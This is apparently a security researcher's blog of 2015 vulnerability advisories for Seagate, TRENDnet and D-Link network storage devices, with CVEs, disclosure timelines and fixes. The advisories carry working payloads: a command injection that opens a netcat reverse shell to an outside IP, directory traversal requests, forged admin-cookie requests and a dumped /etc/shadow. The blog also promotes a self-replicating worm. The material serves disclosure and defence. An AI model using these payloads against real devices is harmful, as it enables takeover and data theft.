Wednesday, February 25, 2015

[Exploit] Seagate BlackArmor Network Storage System


Seagate BlackArmor Business Storage Network Storage System

Vulnerability: Command Injection
CVE: CVE-2014-2701

Description
The Seagate BlackArmor network storage system is susceptible to a root command injection vulnerability, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /index.php/mv_system/send_test_email
POST Data - email_recipients=%3Crecipients%3E%3Crecipient%3E%3Cemail%3E`nc 192.168.1.177 80 -e /bin/sh`%3C%2Femail%3E%3C%2Frecipient%3E%3C%2Frecipients%3E

Attack Requirements
- Authenticated session or valid user credentials (Auth can be bypassed due to broken session management.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but due to broken session management, a remote adversary is able to call the “/index.php/mv_system/send_test_email” program without authentication. This ultimately results in unauthenticated OS command injection attack, which is demonstrated in the stand alone proof of concept exploit.

This exploit should work against other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/seagate_root_cmd_inject.py




Vulnerability: Cross-Site Request Forgery
CVE: Pending

Description
The Seagate BlackArmor is susceptible to several Cross-Site Request Forgery attacks, which allows an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP request.

Details
All HTML forms severed by the Seagate BlackArmor are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations
- Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contains unique tokens.
- In addition to HTML form tokens, HTTP referrer checking should be enabled
- Require users to re-authenticate before performing an application state change.

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass/Broken Session Management)
CVE: Pending

Description
The Seagate BlackArmor network storage system is susceptible to Missing Function Level Access Control (Authentication bypass due to broken session management) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Seagate session cookies are generated using user information and then encrypted. The resulting value is then used to keep track of a particular individuals application state. This cookie can be configured with an infinite expiration time, which results in generated cookies lasting forever. To demonstrate this issue, ISE used a permanently authenticated session cookie in conjunction with CVE-2014-2701 to execute operating system commands.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- This vulnerability is demonstrated in conjunction with CVE-2014-2701.




Vulnerability: Directory Traversal
CVE: CVE-2014-2702

Description
The Seagate BlackArmor network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to access protected system locations.

Attack Requirements
- Authenticated session or valid user credentials (Authentication Bypass/Broken Session Management)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other Seagate Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access protected data, which could lead to elevated privileges.

Vendor Recommendations
- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “/index.php/mv_backup/get_backup_from_location” require authentication. An attacker can circumvent this by utilizing methods described by Missing Function Level Access Control (Authentication Bypass/Broken Session Management).


—Directory Listing—

POST /index.php/mv_backup/get_backup_from_location
POST Data - task_type=nas_nas&path=%2Fetc&test_connection=+





Vulnerability: Undocumented System User (Backdoor User)
CVE: Pending

Description
The Seagate BlackArmor network storage system contains an undocumented system user. This users password is the only Seagate system user whose password is protected by the insecure decrypt algorithm.

Details
- This user should be present in other Seagate Network Storage Systems.
- This user can be used to access the Seagate network storage system.

Impact
- Unknown - An attacker could gain system access by leveraging undocumented user accounts.

Vendor Recommendations
- Remove undocumented user accounts.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept

cat /etc/shadow

root:aL86k2VEuV4cY:16378:0:99999:7:::
devuser:x:16378:0:99999:7:::
avahi-autoipd:!:16378:0:99999:7:::
ftp:!:16378:0:99999:7:::
w41t980ck4pu63r:CsRCvByKdCO.c:16378:0:99999:7:::
admin:F1PYtWpQ/pGGY:16378:0:99999:7:::






Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure - 2/25/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

Thursday, January 22, 2015

[Exploit] TRENDnet TN-200/200 T1 Network Storage System

TRENDnet TN-200/200 T1 Network Storage System
Note: CVE-2014-1628 and CVE-2014-1630 are used in my N.A.S.ty Worm

Vulnerability: Command Injection

CVE: CVE-2014-1628

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to several command injection vulnerabilities, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /cgi-bin/system_mgr.cgi
POST Data - cmd=cgi_log_server&f_enable=1&f_ip=`cmd`

POST cgi-bin/remote_backup.cgi
POST Data - cmd=cgi_server_test&ip=`cmd`&s_type=2&direction=2&task=Test&keep_exist_file=0&local_path=undefined&incremental=0&encryption=0&rsync_user=Gimppy&rsync_pw=&ssh_user=&ssh_pw=&inc_num=-1

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1629 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (CVE-2014-1629), a remote adversary can call the “/cgi-bin/system_mgr.cgi” or “remote_backup.cgi” CGI program without authentication. This ultimately results in unauthenticated OS command injection attack, which is demonstrated in the stand alone proof of concept exploit and N.A.S.ty worm.

This exploit should work against other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Cross-Site Request Forgery
CVE: CVE-2014-1629

Description
The TRENDnet TN-200/200 T1 is susceptible to several Cross-Site Request Forgery attacks, which allows an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP.

Details
All HTML forms severed by the TRENDnet TN-200/200 T1 are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations

- Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contains unique tokens.
- In addition to HTML form tokens, HTTP referrer checking should be enabled
- Require users to re-authenticate before performing an application state change.

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-1630

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by TRENDnet storage systems is severely broken and insecure. For example, TRENDnet uses an authentication cookie  named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other TRENDnet Network Storage Systems.
- Missing Function Level Access Control (Authentication Bypass) is only present in firmware versions less than 1.02.
- Broken Session Management (insecure username cookie) is present in firmware versions greater than or equal to 1.02.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-1630 is demonstrated in conjunction with CVE-2014-1628 -  https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Multiple Directory Traversal Vulnerabilities

CVE: CVE-2014-2703

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1630 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “webfile_mgr.cgi” and “folder_tree.cgi” require authentication. An attacker can circumvent this by utilizing methods described by CVE-2014-1630.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html




—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX


—Directory Listing—

POST /cgi-bin/folder_tree.cgi HTTP/1.1
POST Data - dir=%2Fetc%2F&cmd=cgi_open_&show_file=&chk_flag=1&file_type=all&function_id=upnp_av




Vulnerability: Information Disclosure
CVE: CVE-2014-2704

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Information Disclosure attacks, which allow an attacker to read arbitrary files from the “xml” and “common” directories located in the web root of the affected system.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access system files located on the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should enforce authentication and authorization before granting access to any file located within the web root.
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.




Disclosure Timeline
- CVE Numbers Assigned - 1/21/2014 and 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/22/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

Wednesday, January 21, 2015

[Black Hat USA 2014 Video] My N.A.S.ty BH briefing!

Black Hat USA 2014 
 Network Attached Shell N.A.S.ty Systems that Store Network Accessible Shells

Note: I was sick and talked too much. I ran out of time! It was an honor to speak at both Black Hat USA  and Black Hat Europe in the same year (2014). I successfully turned the results I presented at Black Hat USA into a piece of self-replicating malware, which I later presented at Black Hat Europe (Much better presentation imo haha). Source code is currently unavailable for my N.A.S.ty worm prototype, but I expect to release it soon. Frequently check https://github.com/Gimppy042 frequently, as I will be updating it every so often.

[Exploit] D-Link DNS-345 Network Storage System

D-Link DNS-345 Network Storage System
Note: CVE-2014-2691 and CVE-2014-2692 are used in my N.A.S.ty Worm

Vulnerability: Command Injection
CVE: CVE-2014-2691

Description
The D-Link DNS-345 network storage system is susceptible to several command injection attacks, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (below), a remote adversary can call the “/cgi-bin/system_mgr.cgi” program without authentication. This ultimately results in unauthenticated OS command injection attack, which is demonstrated in the stand alone proof of concept exploit and N.A.S.ty worm.

This exploit should work against other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-2692

Description
The D-Link DNS-345 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by D-Link storage systems is severely broken and insecure. For example, D-Link uses an authentication cookie  named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other D-Link Network Storage Systems.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-2692 is demonstrated in conjunction with CVE-2014-2691 - https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Multiple Directory Traversal Vulnerabilities
CVE: CVE-2014-2693

Description
The D-Link DNS-345 network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- The following HTTP requests show how an attacker can read and write to the D-Link DNS-345 filesystem. Remember, while calls to “webfile_mgr.cgi require authentication”, an attacker can circumvent this by utilizing methods described by CVE-2014-2692.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Content-Length: 95
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 53
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html



—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 111
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX



POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Cookie: username=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 194

cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX





Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/21/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators

[Exploit] N.A.S.ty Worm Demo

N.A.S.ty VIDEO COMING SOON!
PROTOTYPE SOURCE CODE WILL BE RELEASED SOON.

In the interim, check out my brief segment on Hacker Hotshots where I discuss my network storage research and demonstrate the capabilities of self-replicating malware!!!